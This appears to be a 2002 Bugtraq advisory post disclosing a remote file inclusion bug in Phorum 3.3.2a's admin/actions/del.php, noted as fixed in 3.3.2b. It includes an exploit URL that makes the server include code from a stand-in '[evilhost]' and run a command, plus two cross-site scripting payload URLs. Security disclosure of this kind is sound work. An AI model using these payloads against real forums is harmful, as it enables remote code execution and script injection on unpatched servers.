Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Phorum 3.3.2a has another bug for remote command execution

From: "Markus Arndt" <markus-arndt () web de>
Date: Sat, 18 May 2002 12:32:56 +0200
Target:
Phorum 3.3.2a (maybee older)

Description:
Phorum 3.3.2a let's remote users execute arbitary code

Found by:
Markus Arndt<markus-arndt () web de>

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed in 3.3.2b

Details:


Another bug for remote command execution.
This time it's admin/actions/del.php
:)

Some code:
<?php
    require "$include_path/delete_message.php";
    delete_messages($id);
    QueMessage("Message(s) $id and all children were deleted!<br>");
?>

The url to exploit the script would be:
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls

That url will make the script include http://[evilhost]/delete_message.php


GoGoGo and secure your boxes. :)





One other thing before i forget:
CSS-Attacks are possible on 2 files..

http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>


Markus Arndt<markus-arndt () web de>
http://skka.de
________________________________________________________________
Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! 
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
Previous By Date Next
Previous By Thread Next

Current thread: